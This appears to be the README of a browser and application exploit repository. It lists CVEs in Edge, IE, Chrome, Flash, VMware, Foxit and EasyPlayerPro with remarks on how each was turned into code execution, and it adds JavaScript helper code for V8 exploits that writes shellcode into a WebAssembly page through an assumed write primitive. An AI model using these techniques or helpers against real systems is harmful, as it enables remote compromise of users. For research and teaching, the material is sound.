CVE | Platform | OS | Description | Remarks |
---|---|---|---|---|
CVE-2016-0117 | Microsoft Edge | Windows | OOB Write when performing PostScript operations | To my knowledge, no PoC is available. I recreated this from listening to Mark Yason's talks on YouTube. No RCE (and sadly no time to construct a full RCE, though it should be possible) |
CVE-2019-0567 | Microsoft Edge | Windows | Type Confusion via Chakra (Edge) JIT optimisation | |
CVE-2020-0674 | IE11 | Windows | UaF in the legacy JScript engine (jscript.dll, not Chakra) in the Array sort function | Reachable from IE11 only when the page is rendered with the legacy jscript.dll engine (e.g. a legacy document mode), since IE9+ normally runs Chakra (jscript9.dll) |

CVE | Platform | OS | Description | Remarks |
---|---|---|---|---|
CVE-2012-1876 | IE8 | Windows | Heap Buffer Overflow when updating an HTML Col element | Obtain full RCE bypassing DEP and ASLR: use the overflow first for an information leak, then to overwrite a virtual function table pointer |
CVE-2015-3104 | Adobe Flash on Firefox | Windows | Integer Overflow when updating a Shader object via Shader jobs | Obtain Adobe Flash sandboxed RCE bypassing DEP and ASLR: use the overflow to build read/write primitives, then use them to write shellcode and fake virtual function tables. The bug is in Flash Player itself, so it should be reachable from most browsers, and Flash Player sandbox escapes exist for these specific versions (17.0.0.188 and prior) running on Internet Explorer |
CVE-2017-4905 | VMware Workstation | Windows | OOB Read of uninitialized buffer contents | Obtain an information leak from the vmware-vmx.exe stack |
CVE-2017-???? | VMware Workstation | Windows | UaF via Drag-and-Drop (dnd) RPC commands | Obtain full RCE bypassing DEP by creating fake virtual function tables. Chain with CVE-2017-4905 to bypass ASLR |
CVE-2018-17463 | Chrome | Windows | Type Confusion via Turbofan optimisation | Obtain renderer-sandboxed RCE bypassing DEP and ASLR by creating read/write primitives and writing shellcode into the WASM RWX page. If the JIT region is W^X, fall back to JIT spraying (shellcode carried in constants the JIT emits itself) or simply use the WASM page. |
CVE-2018-9948 | Foxit PDF Reader | Windows | OOB Read of uninitialized buffer contents | Obtain an information leak from the foxit.exe stack |
CVE-2018-9958 | Foxit PDF Reader | Windows | UaF via Foxit PDF Reader text annotations | Obtain full RCE bypassing DEP by creating fake virtual function tables. Chain with CVE-2018-9948 to bypass ASLR |
CVE-2019-13764 | Chrome | Windows | Type Confusion via Turbofan optimisation | Obtain renderer-sandboxed RCE bypassing DEP and ASLR by creating read/write primitives and writing shellcode into the WASM RWX page. If the JIT region is W^X, fall back to JIT spraying (shellcode carried in constants the JIT emits itself) or simply use the WASM page. |
CVE-2019-13768 | Chrome | Windows | UaF in FileWriterImpl (browser-side implementation of the FileWriter Mojo interface) | Obtain full (browser-process) RCE by creating fake structures and fake virtual function tables. Chain with a renderer RCE: MojoJS bindings are disabled by default, so the compromised renderer must first enable them to talk to the browser process over Mojo. |
CVE-2020-6383 | Chrome | Windows | Type Confusion via Turbofan optimisation | Obtain renderer-sandboxed RCE bypassing DEP and ASLR by creating read/write primitives and writing shellcode into the WASM RWX page. If the JIT region is W^X, fall back to JIT spraying (shellcode carried in constants the JIT emits itself) or simply use the WASM page. |
CVE-2020-16040 | Chrome | Windows | Type Confusion via Turbofan optimisation | Obtain renderer-sandboxed RCE bypassing DEP and ASLR by creating read/write primitives and writing shellcode into the WASM RWX page. If the JIT region is W^X, fall back to JIT spraying (shellcode carried in constants the JIT emits itself) or simply use the WASM page. |
CVE-2021-38003 | Chrome | Windows | OOB Read via JSON.stringify() | Obtain renderer-sandboxed RCE bypassing DEP and ASLR by first leaking TheHole (V8's internal hole sentinel), using it to build read/write primitives, then writing shellcode into the WASM RWX page. If the JIT region is W^X, fall back to JIT spraying or simply use the WASM page. |
CVE-2022-1134 | Chrome | Windows | Type Confusion via super() property access and inline caching | Obtain renderer-sandboxed RCE bypassing DEP and ASLR: leak Blink object addresses and their corresponding V8 wrapper addresses with the arbitrary read primitive, construct fake objects to obtain compressed-heap read/write and addrOf primitives, then write shellcode into the WASM RWX page. |
CVE-2023-33693 | EasyPlayerPro | Windows | SEH overflow via LoadConfig() | Obtain code execution via an SEH overflow when the player starts and loads its configuration file (if one is present): an over-long string parsed from the configuration file overflows a stack buffer and overwrites the SEH record |
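The Chrome rows above all end the same way: once the bug yields addrOf/fakeObj and an arbitrary read/write, the rest is bug-independent plumbing. The block below is an added example written for this page, not code from this repository or from any of the exploits it lists. It assumes the exploit supplies `write64` (an arbitrary 64-bit write primitive) and the version-specific offset at which the WASM code page address can be read from the instance; neither is provided here. The float/int bit casts, compressed-pointer handling, the hand-assembled WebAssembly module and the qword-wise shellcode writer run as-is under Node.

```javascript
// Added example for this page (not from the repository or the listed exploits).
// Bug-independent plumbing shared by the V8 renderer exploits in the table:
// the vulnerability-specific part (addrOf / fakeObj / read64 / write64) is
// assumed to come from elsewhere.

const f64 = new Float64Array(1);
const u64 = new BigUint64Array(f64.buffer);

// Reinterpret a double's 8 bytes as an unsigned 64-bit integer, and back.
// Exploits read heap slots as doubles (via a corrupted array) and need the
// raw bits, not the numeric value.
function ftoi(f) { f64[0] = f; return u64[0]; }
function itof(i) { u64[0] = BigInt.asUintN(64, i); return f64[0]; }

// With pointer compression (V8 >= 8.0) one 64-bit slot holds two 32-bit
// tagged values; split a qword into its low and high halves.
function splitCompressed(q) {
  return { lo: Number(q & 0xffffffffn), hi: Number(q >> 32n) };
}

// Heap-object pointers carry a tag bit (low bit set); clear it to get the
// actual offset. The unsigned shift keeps values >= 0x80000000 positive.
function untag(tagged) { return (tagged & ~1) >>> 0; }

// Turn a compressed pointer back into a full address: the upper 32 bits are
// the cage (isolate) base, which is the same for every compressed pointer
// read from the same heap.
function decompress(cageBase, compressed) {
  return (cageBase & 0xffffffff00000000n) | BigInt(untag(compressed));
}

// Hand-assembled minimal WebAssembly module: one exported function
// `main() -> i32` returning 42. Instantiating it makes V8 allocate a code
// page for the compiled function; exploits overwrite that page with shellcode
// and then call `main`.
const WASM_BYTES = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,             // "\0asm", version 1
  0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,                   // type section: () -> i32
  0x03, 0x02, 0x01, 0x00,                                     // function section: func 0 has type 0
  0x07, 0x08, 0x01, 0x04, 0x6d, 0x61, 0x69, 0x6e, 0x00, 0x00, // export "main" = func 0
  0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, 0x2a, 0x0b,             // code: i32.const 42; end
]);
const wasmInstance = new WebAssembly.Instance(new WebAssembly.Module(WASM_BYTES));
const wasmMain = wasmInstance.exports.main;

// Write `shellcode` at `dst` through an arbitrary 64-bit write primitive
// `write64(addr: BigInt, value: BigInt)`. x86-64 is little-endian, so each
// qword is assembled LE; the final partial qword is padded with NOPs so the
// write never drags in unrelated bytes. Returns the number of qwords written.
function writeShellcode(write64, dst, shellcode) {
  const padded = new Uint8Array(Math.ceil(shellcode.length / 8) * 8).fill(0x90);
  padded.set(shellcode);
  const view = new DataView(padded.buffer);
  for (let off = 0; off < padded.length; off += 8) {
    write64(dst + BigInt(off), view.getBigUint64(off, true));
  }
  return padded.length / 8;
}

// Constructed sample payload (not real shellcode): x86-64 `mov eax, 42 ; ret`.
const SAMPLE_SHELLCODE = Uint8Array.of(0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3);

// Stand-alone demo with a recording stand-in for write64. In a real exploit
// `dst` would be the WASM code page address, read from the instance at a
// version-specific offset (assumed known to the exploit, not given here).
function demo() {
  const memory = new Map();
  const n = writeShellcode((a, v) => memory.set(a, v), 0x1000n, SAMPLE_SHELLCODE);
  return { qwords: n, firstQword: memory.get(0x1000n), wasmResult: wasmMain() };
}
```

Whether the WASM page is still RWX, and where its address sits in the instance object, changes between V8 builds (newer ones write-protect it), which is why locating the page is left to the bug-specific code and why the W^X caveat in the remarks column matters.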
- JavaScript engine nomenclature can be quite confusing (especially for the engines released by Microsoft). The engine used by IE9 through IE11 and by pre-Chromium Edge is known as Chakra: in IE it is implemented in jscript9.dll, and in Edge in chakra.dll. Before IE9, IE used the older JScript engine, implemented in jscript.dll; IE11 still ships jscript.dll and loads it for legacy content, which is why bugs such as CVE-2020-0674 live in jscript.dll rather than in Chakra. All of this information can be found on Wikipedia and in Microsoft's research article on the evolution of JavaScript engines in IE and Edge.